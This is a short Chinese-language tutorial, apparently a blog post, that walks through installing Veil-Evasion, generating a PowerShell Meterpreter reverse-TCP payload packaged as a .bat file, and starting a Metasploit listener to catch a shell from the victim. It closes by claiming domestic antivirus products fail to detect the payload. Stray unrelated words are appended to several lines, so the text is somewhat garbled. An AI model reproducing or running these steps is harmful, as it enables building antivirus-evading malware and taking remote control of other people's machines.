首先安装python
┌─[root@sch01ar]─[~] └──╼ #cd /sch01ar/Veil/
┌─[root@sch01ar]─[/sch01ar/Veil] └──╼ #cd setup/
┌─[root@sch01ar]─[/sch01ar/Veil/setup] └──╼ #./setup.sh -c
在安装过程当中,可能会有一处须要输入msf地址的shell
安装完成bash
若是veil在运行的时候有什么错误,可使用命令删除再运行session
┌─[root@sch01ar]─[~] └──╼ #rm -rf /root/.config/wine/veil
┌─[root@sch01ar]─[~] └──╼ #/sch01ar/Veil/setup/setup.sh -c
给Veil权限并打开文件夹tcp
┌─[root@sch01ar]─[/sch01ar] └──╼ #chmod +x Veil/
┌─[root@sch01ar]─[/sch01ar] └──╼ #cd Veil/
若是用python命令打开则会报错工具
┌─[root@sch01ar]─[/sch01ar/Veil] └──╼ #python Veil.py
打开veil3d
┌─[root@sch01ar]─[/sch01ar/Veil] └──╼ #./Veil.py
输入list查看工具列表blog
能够直接回车io
选择1console
回车
输入list查看payload列表
选择22,回车
Veil-Evasion command: use 22
设置LHOST
[powershell/meterpreter/rev_tcp>>] set LHOST 192.168.220.134
生成
[powershell/meterpreter/rev_tcp>>] generate
输入文件名称
回车
生成了一个bat文件和msf模块
bat文件目录为
/usr/share/veil-output/source/sch01ar.bat
msf模块地址
/usr/share/veil-output/handlers/sch01ar.rc
开启msf监听
┌─[root@sch01ar]─[~] └──╼ #msfconsole -r /usr/share/veil-output/handlers/sch01ar.rc
在目标主机运行bat文件,攻击主机获得反弹的目标主机
输入sessions查看会话
病毒扫描结果
国内的杀软都没有检测出来